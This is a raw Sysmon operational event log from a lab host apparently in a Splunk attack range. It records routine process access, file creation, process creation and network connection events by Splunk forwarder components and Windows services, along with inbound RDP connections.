09:19:28.312{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980397Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.312{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8CA0-6151-FC79-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980396Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.296{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CA0-6151-FC79-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980395Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.297{69CF5F33-8CA0-6151-FC79-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980394Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.296{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAC711CD62F23C01DB519577B2A2E94F,SHA256=9F47F017231DCBBA1131B1A861614A204C8C9384D7CB0134C1B229C3C33E854F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980423Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:29.562{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A938614F01D8E8195D102F12A0C7E1,SHA256=71BE53A092F36B94D137D4C4830298EECE8A74D4816AA724677F6683CFB7E237,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980422Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:29.562{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5F92AC72EAE2331C0235AF098A34572,SHA256=AA12DEEDF8B0D132F85FCC4A98845A4B652F968EC1A4278A16D769A1784DB779,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980421Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:29.187{69CF5F33-8CA0-6151-FD79-00000000FD01}26082392C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980420Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:29.000{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CA0-6151-FD79-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980419Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980418Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980417Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980416Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980415Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980414Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980413Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980412Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980411Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980410Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8CA0-6151-FD79-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980409Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.984{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CA0-6151-FD79-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980408Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:28.985{69CF5F33-8CA0-6151-FD79-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980424Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:30.578{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=776F6D497BF356EEE248525351F9758F,SHA256=BB611FEB65721566CE825B92CA2FB5FA421C46BDDB7CE13F9D9E911CDC66778D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980425Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:31.812{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CDAC07817391284BBF5E1DF3B55CF6F,SHA256=E5E0912BC7A254E2CC8F9B1BF7BAE4D10C7600C87837743B59B82C5D68B6F342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980426Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:32.593{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F9E4146AB059630D9425416FFE547D74,SHA256=1F669E99652B172C44E82923BFA0EEEFE2B8C83D4255A28DC64E89015107D47B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980428Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:29.632{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59646-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980427Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:33.046{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0BBCC4F2940F8F79F60EFFE69DCDB3,SHA256=D9DBE17C2ECC9709F806B88A1A595EA3632E59796877A4468D4995B512D100F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980430Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:34.281{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4EA687F9187A72ACA5F900E08DCD2A,SHA256=227705DF70785D4932432F70CC6F62342D8559D12A7CC6C0D0A4C420F30FD5C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980429Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:30.638{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59479-false10.0.1.12-8000- 23542300x8000000000000000980432Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:35.343{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=044041E3C8F558BE9B82306E7D101496,SHA256=478493D22B930B3C447BD8C5FBF12D6C53A88DC1AB69F552FD4C82E5B0535A94,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980431Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:31.388{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60613-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980433Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:36.359{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=860922D6BD03DB93AE78AAF88A8C9BBB,SHA256=795F2F627939402771E68876D106F6A9DFD1969886E8CCB015FD9648A6B7BC96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980447Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CA9-6151-FE79-00000000FD01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980446Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980445Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 